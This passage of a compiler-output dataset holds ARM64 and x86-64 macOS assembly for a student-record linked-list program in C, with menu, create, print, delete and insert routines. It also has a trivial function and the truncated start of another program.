LBB0_15: mov w0, #0 ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .globl _Printlinklist ; -- Begin function Printlinklist .p2align 2 _Printlinklist: ; @Printlinklist .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] adrp x8, _n@GOTPAGE ldr x8, [x8, _n@GOTPAGEOFF] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.22@PAGE add x0, x0, l_.str.22@PAGEOFF bl _printf adrp x0, l_.str.23@PAGE add x0, x0, l_.str.23@PAGEOFF bl _printf ldur x8, [x29, #-8] stur x8, [x29, #-16] ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_5 b LBB1_1 LBB1_1: b LBB1_2 LBB1_2: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-16] ldr w8, [x8] ; implicit-def: $x12 mov x12, x8 ldur x8, [x29, #-16] add x11, x8, #4 ldur x8, [x29, #-16] add x10, x8, #24 ldur x8, [x29, #-16] ldr w9, [x8, #36] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.24@PAGE add x0, x0, l_.str.24@PAGEOFF bl _printf ldur x8, [x29, #-16] ldr x8, [x8, #40] stur x8, [x29, #-16] b LBB1_3 LBB1_3: ; in Loop: Header=BB1_2 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_4 LBB1_4: b LBB1_5 LBB1_5: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _Del ; -- Begin function Del .p2align 2 _Del: ; @Del .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x0, l_.str.25@PAGE add x0, x0, l_.str.25@PAGEOFF bl _printf ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB2_14 LBB2_2: ldur x8, [x29, #-16] str x8, [sp, #32] b LBB2_3 LBB2_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #32] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, eq mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB2_5 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #40] subs x8, x8, #0 cset w8, ne str w8, [sp, #20] ; 4-byte Folded Spill b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB2_7 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_3 Depth=1 ldr x8, [sp, #32] str x8, [sp, #24] ldr x8, [sp, #32] ldr x8, [x8, #40] str x8, [sp, #32] b LBB2_3 LBB2_7: ldr x8, [sp, #32] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_12 b LBB2_8 LBB2_8: ldr x8, [sp, #32] ldur x9, [x29, #-16] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: ldr x8, [sp, #32] ldr x8, [x8, #40] stur x8, [x29, #-16] b LBB2_11 LBB2_10: ldr x8, [sp, #32] ldr x8, [x8, #40] ldr x9, [sp, #24] str x8, [x9, #40] b LBB2_11 LBB2_11: ldr x0, [sp, #32] bl _free ; kill: def $x8 killed $xzr str xzr, [sp, #32] ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.26@PAGE add x0, x0, l_.str.26@PAGEOFF bl _printf adrp x9, _n@GOTPAGE ldr x9, [x9, _n@GOTPAGEOFF] ldr w8, [x9] subs w8, w8, #1 str w8, [x9] b LBB2_13 LBB2_12: ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.27@PAGE add x0, x0, l_.str.27@PAGEOFF bl _printf b LBB2_13 LBB2_13: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB2_14 LBB2_14: ldur x0, [x29, #-8] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _Insert ; -- Begin function Insert .p2align 2 _Insert: ; @Insert .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _n@GOTPAGE ldr x8, [x8, _n@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill stur x0, [x29, #-16] stur w1, [x29, #-20] str x2, [sp, #32] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #32] stur x8, [x29, #-16] ldr x8, [sp, #32] ; kill: def $x10 killed $xzr str xzr, [x8, #40] ldr w8, [x9] add w8, w8, #1 str w8, [x9] ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB3_11 LBB3_2: ldur x8, [x29, #-16] str x8, [sp, #24] b LBB3_3 LBB3_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB3_5 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #40] subs x8, x8, #0 cset w8, ne str w8, [sp, #12] ; 4-byte Folded Spill b LBB3_5 LBB3_5: ; in Loop: Header=BB3_3 Depth=1 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB3_7 b LBB3_6 LBB3_6: ; in Loop: Header=BB3_3 Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #40] str x8, [sp, #24] b LBB3_3 LBB3_7: ldr x8, [sp, #24] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB3_9 b LBB3_8 LBB3_8: ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #24] ldr x8, [x8, #40] ldr x10, [sp, #32] str x8, [x10, #40] ldr x8, [sp, #32] ldr x10, [sp, #24] str x8, [x10, #40] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB3_10 LBB3_9: ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.28@PAGE add x0, x0, l_.str.28@PAGEOFF bl _printf b LBB3_10 LBB3_10: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB3_11 LBB3_11: ldur x0, [x29, #-8] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _Create ; -- Begin function Create .p2align 2 _Create: ; @Create .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _n@GOTPAGE ldr x8, [x8, _n@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill ; kill: def $x9 killed $xzr stur xzr, [x29, #-24] stur xzr, [x29, #-32] str wzr, [x8] mov x0, #48 bl _malloc stur x0, [x29, #-24] ldur x8, [x29, #-24] stur x8, [x29, #-32] ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _printf ; kill: def $x8 killed $xzr stur xzr, [x29, #-8] b LBB4_10 LBB4_2: ldr x8, [sp, #40] ; 8-byte Folded Reload ; kill: def $x9 killed $xzr stur xzr, [x29, #-16] ldr w8, [x8] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.21@PAGE add x0, x0, l_.str.21@PAGEOFF bl _printf adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf ldur x12, [x29, #-24] ldur x8, [x29, #-24] add x11, x8, #4 ldur x8, [x29, #-24] add x10, x8, #24 ldur x8, [x29, #-24] add x8, x8, #36 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _scanf b LBB4_3 LBB4_3: b LBB4_4 LBB4_4: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-24] ldr w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_9 b LBB4_5 LBB4_5: ; in Loop: Header=BB4_4 Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload ldr w9, [x8] add w9, w9, #1 str w9, [x8] ldr w8, [x8] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: ; in Loop: Header=BB4_4 Depth=1 ldur x8, [x29, #-24] stur x8, [x29, #-16] ldur x8, [x29, #-32] ; kill: def $x9 killed $xzr str xzr, [x8, #40] b LBB4_8 LBB4_7: ; in Loop: Header=BB4_4 Depth=1 ldur x8, [x29, #-24] ldur x9, [x29, #-32] str x8, [x9, #40] b LBB4_8 LBB4_8: ; in Loop: Header=BB4_4 Depth=1 ldur x8, [x29, #-24] stur x8, [x29, #-32] mov x0, #48 bl _malloc ldr x8, [sp, #40] ; 8-byte Folded Reload stur x0, [x29, #-24] ldr w8, [x8] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.21@PAGE add x0, x0, l_.str.21@PAGEOFF bl _printf adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf ldur x12, [x29, #-24] ldur x8, [x29, #-24] add x11, x8, #4 ldur x8, [x29, #-24] add x10, x8, #24 ldur x8, [x29, #-24] add x8, x8, #36 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _scanf b LBB4_4 LBB4_9: ldur x8, [x29, #-32] ; kill: def $x9 killed $xzr str xzr, [x8, #40] ldur x0, [x29, #-24] bl _free stur xzr, [x29, #-24] ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB4_10 LBB4_10: ldur x0, [x29, #-8] ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "========================================\n" l_.str.1: ; @.str.1 .asciz "| Please Choose your option |\n" l_.str.2: ; @.str.2 .asciz "| Input the number to choose |\n" l_.str.3: ; @.str.3 .asciz "| 1:Creat a list of student |\n" l_.str.4: ; @.str.4 .asciz "| 2:Show all the student information |\n" l_.str.5: ; @.str.5 .asciz "| 3:Delete the student by number |\n" l_.str.6: ; @.str.6 .asciz "| 4:Insert a student information |\n" l_.str.7: ; @.str.7 .asciz "| 0:Exit 9:Run |\n" l_.str.8: ; @.str.8 .asciz "%d" l_.str.9: ; @.str.9 .asciz "Input the student information\n" l_.str.10: ; @.str.10 .asciz "Input 0 0 0 0 to stop\n" l_.str.11: ; @.str.11 .asciz "Please input the student number\n" l_.str.12: ; @.str.12 .asciz "you want to delete\n" l_.str.13: ; @.str.13 .asciz "Please input the student information\n" l_.str.14: ; @.str.14 .asciz "\nStudent number name sex age\n" l_.str.15: ; @.str.15 .asciz "%d%s%s%d" l_.str.16: ; @.str.16 .asciz "Please input the place you want to insert\n" l_.str.17: ; @.str.17 .asciz "(a student number befor you want to insert)\n" l_.str.18: ; @.str.18 .asciz "Goodbye!\n" l_.str.19: ; @.str.19 .asciz "OK!\n" .comm _n,4,2 ; @n l_.str.20: ; @.str.20 .asciz "\nCann't create it!\n" l_.str.21: ; @.str.21 .asciz "Please input %d node information" l_.str.22: ; @.str.22 .asciz "\nNow , These %d records are:\n\n" l_.str.23: ; @.str.23 .asciz "Number\tName\tsex\tage\n\n" l_.str.24: ; @.str.24 .asciz "%d\t%s\t%s\t%d\n" l_.str.25: ; @.str.25 .asciz "\nList is null!\n" l_.str.26: ; @.str.26 .asciz "\nDelete %d success!\n" l_.str.27: ; @.str.27 .asciz "\n%d Not been found!\n" l_.str.28: ; @.str.28 .asciz "\n%d not been found!\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $1, -16(%rbp) movq $0, -24(%rbp) movq $0, -32(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $1, -16(%rbp) jne LBB0_15 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.8(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf cmpl $1, -8(%rbp) jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.9(%rip), %rdi movb $0, %al callq _printf leaq L_.str.10(%rip), %rdi movb $0, %al callq _printf callq _Create movq %rax, -24(%rbp) LBB0_4: ## in Loop: Header=BB0_1 Depth=1 cmpl $2, -8(%rbp) jne LBB0_6 ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 movq -24(%rbp), %rdi callq _Printlinklist LBB0_6: ## in Loop: Header=BB0_1 Depth=1 cmpl $3, -8(%rbp) jne LBB0_8 ## %bb.7: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf leaq L_.str.12(%rip), %rdi movb $0, %al callq _printf leaq L_.str.8(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf movq -24(%rbp), %rdi movl -12(%rbp), %esi callq _Del LBB0_8: ## in Loop: Header=BB0_1 Depth=1 cmpl $4, -8(%rbp) jne LBB0_10 ## %bb.9: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movl $48, %edi callq _malloc movq %rax, -32(%rbp) movq -32(%rbp), %rsi movq -32(%rbp), %rdx addq $4, %rdx movq -32(%rbp), %rcx addq $24, %rcx movq -32(%rbp), %r8 addq $36, %r8 leaq L_.str.15(%rip), %rdi movb $0, %al callq _scanf leaq L_.str.16(%rip), %rdi movb $0, %al callq _printf leaq L_.str.17(%rip), %rdi movb $0, %al callq _printf leaq L_.str.8(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf movq -24(%rbp), %rdi movl -12(%rbp), %esi movq -32(%rbp), %rdx callq _Insert LBB0_10: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -8(%rbp) jne LBB0_12 ## %bb.11: leaq L_.str.18(%rip), %rdi movb $0, %al callq _printf jmp LBB0_15 LBB0_12: ## in Loop: Header=BB0_1 Depth=1 cmpl $9, -8(%rbp) jne LBB0_14 ## %bb.13: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.19(%rip), %rdi movb $0, %al callq _printf LBB0_14: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_15: xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _Printlinklist ## -- Begin function Printlinklist .p2align 4, 0x90 _Printlinklist: ## @Printlinklist .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq _n@GOTPCREL(%rip), %rax movl (%rax), %esi leaq L_.str.22(%rip), %rdi movb $0, %al callq _printf leaq L_.str.23(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rax movq %rax, -16(%rbp) cmpq $0, -8(%rbp) je LBB1_5 ## %bb.1: jmp LBB1_2 LBB1_2: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movl (%rax), %esi movq -16(%rbp), %rdx addq $4, %rdx movq -16(%rbp), %rcx addq $24, %rcx movq -16(%rbp), %rax movl 36(%rax), %r8d leaq L_.str.24(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rax movq 40(%rax), %rax movq %rax, -16(%rbp) ## %bb.3: ## in Loop: Header=BB1_2 Depth=1 cmpq $0, -16(%rbp) jne LBB1_2 ## %bb.4: jmp LBB1_5 LBB1_5: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _Del ## -- Begin function Del .p2align 4, 0x90 _Del: ## @Del .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) cmpq $0, -16(%rbp) jne LBB2_2 ## %bb.1: leaq L_.str.25(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB2_14 LBB2_2: movq -16(%rbp), %rax movq %rax, -32(%rbp) LBB2_3: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax movl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -20(%rbp), %ecx movb %al, -41(%rbp) ## 1-byte Spill je LBB2_5 ## %bb.4: ## in Loop: Header=BB2_3 Depth=1 movq -32(%rbp), %rax cmpq $0, 40(%rax) setne %al movb %al, -41(%rbp) ## 1-byte Spill LBB2_5: ## in Loop: Header=BB2_3 Depth=1 movb -41(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_6 jmp LBB2_7 LBB2_6: ## in Loop: Header=BB2_3 Depth=1 movq -32(%rbp), %rax movq %rax, -40(%rbp) movq -32(%rbp), %rax movq 40(%rax), %rax movq %rax, -32(%rbp) jmp LBB2_3 LBB2_7: movq -32(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jne LBB2_12 ## %bb.8: movq -32(%rbp), %rax cmpq -16(%rbp), %rax jne LBB2_10 ## %bb.9: movq -32(%rbp), %rax movq 40(%rax), %rax movq %rax, -16(%rbp) jmp LBB2_11 LBB2_10: movq -32(%rbp), %rax movq 40(%rax), %rcx movq -40(%rbp), %rax movq %rcx, 40(%rax) LBB2_11: movq -32(%rbp), %rdi callq _free movq $0, -32(%rbp) movl -20(%rbp), %esi leaq L_.str.26(%rip), %rdi movb $0, %al callq _printf movq _n@GOTPCREL(%rip), %rax movl (%rax), %ecx subl $1, %ecx movq _n@GOTPCREL(%rip), %rax movl %ecx, (%rax) jmp LBB2_13 LBB2_12: movl -20(%rbp), %esi leaq L_.str.27(%rip), %rdi movb $0, %al callq _printf LBB2_13: movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB2_14: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _Insert ## -- Begin function Insert .p2align 4, 0x90 _Insert: ## @Insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq %rdx, -32(%rbp) cmpq $0, -16(%rbp) jne LBB3_2 ## %bb.1: movq -32(%rbp), %rax movq %rax, -16(%rbp) movq -32(%rbp), %rax movq $0, 40(%rax) movq _n@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _n@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB3_11 LBB3_2: movq -16(%rbp), %rax movq %rax, -40(%rbp) LBB3_3: ## =>This Inner Loop Header: Depth=1 movq -40(%rbp), %rax movl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -20(%rbp), %ecx movb %al, -41(%rbp) ## 1-byte Spill je LBB3_5 ## %bb.4: ## in Loop: Header=BB3_3 Depth=1 movq -40(%rbp), %rax cmpq $0, 40(%rax) setne %al movb %al, -41(%rbp) ## 1-byte Spill LBB3_5: ## in Loop: Header=BB3_3 Depth=1 movb -41(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB3_6 jmp LBB3_7 LBB3_6: ## in Loop: Header=BB3_3 Depth=1 movq -40(%rbp), %rax movq 40(%rax), %rax movq %rax, -40(%rbp) jmp LBB3_3 LBB3_7: movq -40(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jne LBB3_9 ## %bb.8: movq -40(%rbp), %rax movq 40(%rax), %rcx movq -32(%rbp), %rax movq %rcx, 40(%rax) movq -32(%rbp), %rcx movq -40(%rbp), %rax movq %rcx, 40(%rax) movq _n@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _n@GOTPCREL(%rip), %rax movl %ecx, (%rax) jmp LBB3_10 LBB3_9: movl -20(%rbp), %esi leaq L_.str.28(%rip), %rdi movb $0, %al callq _printf LBB3_10: movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB3_11: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _Create ## -- Begin function Create .p2align 4, 0x90 _Create: ## @Create .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq $0, -24(%rbp) movq $0, -32(%rbp) movq _n@GOTPCREL(%rip), %rax movl $0, (%rax) movl $48, %edi callq _malloc movq %rax, -24(%rbp) movq -24(%rbp), %rax movq %rax, -32(%rbp) cmpq $0, -24(%rbp) jne LBB4_2 ## %bb.1: leaq L_.str.20(%rip), %rdi movb $0, %al callq _printf movq $0, -8(%rbp) jmp LBB4_10 LBB4_2: movq $0, -16(%rbp) movq _n@GOTPCREL(%rip), %rax movl (%rax), %esi addl $1, %esi leaq L_.str.21(%rip), %rdi movb $0, %al callq _printf leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movq -24(%rbp), %rsi movq -24(%rbp), %rdx addq $4, %rdx movq -24(%rbp), %rcx addq $24, %rcx movq -24(%rbp), %r8 addq $36, %r8 leaq L_.str.15(%rip), %rdi movb $0, %al callq _scanf ## %bb.3: jmp LBB4_4 LBB4_4: ## =>This Inner Loop Header: Depth=1 movq -24(%rbp), %rax cmpl $0, (%rax) je LBB4_9 ## %bb.5: ## in Loop: Header=BB4_4 Depth=1 movq _n@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _n@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _n@GOTPCREL(%rip), %rax cmpl $1, (%rax) jne LBB4_7 ## %bb.6: ## in Loop: Header=BB4_4 Depth=1 movq -24(%rbp), %rax movq %rax, -16(%rbp) movq -32(%rbp), %rax movq $0, 40(%rax) jmp LBB4_8 LBB4_7: ## in Loop: Header=BB4_4 Depth=1 movq -24(%rbp), %rcx movq -32(%rbp), %rax movq %rcx, 40(%rax) LBB4_8: ## in Loop: Header=BB4_4 Depth=1 movq -24(%rbp), %rax movq %rax, -32(%rbp) movl $48, %edi callq _malloc movq %rax, -24(%rbp) movq _n@GOTPCREL(%rip), %rax movl (%rax), %esi addl $1, %esi leaq L_.str.21(%rip), %rdi movb $0, %al callq _printf leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movq -24(%rbp), %rsi movq -24(%rbp), %rdx addq $4, %rdx movq -24(%rbp), %rcx addq $24, %rcx movq -24(%rbp), %r8 addq $36, %r8 leaq L_.str.15(%rip), %rdi movb $0, %al callq _scanf jmp LBB4_4 LBB4_9: movq -32(%rbp), %rax movq $0, 40(%rax) movq -24(%rbp), %rdi callq _free movq $0, -24(%rbp) movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB4_10: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "========================================\n" L_.str.1: ## @.str.1 .asciz "| Please Choose your option |\n" L_.str.2: ## @.str.2 .asciz "| Input the number to choose |\n" L_.str.3: ## @.str.3 .asciz "| 1:Creat a list of student |\n" L_.str.4: ## @.str.4 .asciz "| 2:Show all the student information |\n" L_.str.5: ## @.str.5 .asciz "| 3:Delete the student by number |\n" L_.str.6: ## @.str.6 .asciz "| 4:Insert a student information |\n" L_.str.7: ## @.str.7 .asciz "| 0:Exit 9:Run |\n" L_.str.8: ## @.str.8 .asciz "%d" L_.str.9: ## @.str.9 .asciz "Input the student information\n" L_.str.10: ## @.str.10 .asciz "Input 0 0 0 0 to stop\n" L_.str.11: ## @.str.11 .asciz "Please input the student number\n" L_.str.12: ## @.str.12 .asciz "you want to delete\n" L_.str.13: ## @.str.13 .asciz "Please input the student information\n" L_.str.14: ## @.str.14 .asciz "\nStudent number name sex age\n" L_.str.15: ## @.str.15 .asciz "%d%s%s%d" L_.str.16: ## @.str.16 .asciz "Please input the place you want to insert\n" L_.str.17: ## @.str.17 .asciz "(a student number befor you want to insert)\n" L_.str.18: ## @.str.18 .asciz "Goodbye!\n" L_.str.19: ## @.str.19 .asciz "OK!\n" .comm _n,4,2 ## @n L_.str.20: ## @.str.20 .asciz "\nCann't create it!\n" L_.str.21: ## @.str.21 .asciz "Please input %d node information" L_.str.22: ## @.str.22 .asciz "\nNow , These %d records are:\n\n" L_.str.23: ## @.str.23 .asciz "Number\tName\tsex\tage\n\n" L_.str.24: ## @.str.24 .asciz "%d\t%s\t%s\t%d\n" L_.str.25: ## @.str.25 .asciz "\nList is null!\n" L_.str.26: ## @.str.26 .asciz "\nDelete %d success!\n" L_.str.27: ## @.str.27 .asciz "\n%d Not been found!\n" L_.str.28: ## @.str.28 .asciz "\n%d not been found!\n" .subsections_via_symbols
the_stack_data/162119.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ; -- Begin function f .p2align 2 _f: ; @f .cfi_startproc ; %bb.0: mov w0, #0 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ## -- Begin function f .p2align 4, 0x90 _f: ## @f .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/165767122.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #320 .cfi_def_cfa_offset 320 stp x28, x27, [sp, #288] ; 16-byte Folded Spill stp x29, x30, [sp, #304] ; 16-byte Folded Spill add x29, sp, #304 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] str x8, [sp, #72] ; 8-byte Folded Spill adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] str x8, [sp, #48] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str w0, [sp, #116] str x1, [sp, #104] sub x0, x29, #104 str x0, [sp, #80] ; 8-byte Folded Spill mov w1, #0 str w1, [sp, #60] ; 4-byte Folded Spill mov x2, #80 str x2, [sp, #64] ; 8-byte Folded Spill bl _memset ldr w1, [sp, #60] ; 4-byte Folded Reload ldr x2, [sp, #64] ; 8-byte Folded Reload add x0, sp, #120 bl _memset ldr x8, [sp, #72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _fprintf ldr x8, [sp, #80] ; 8-byte Folded Reload adrp x9, 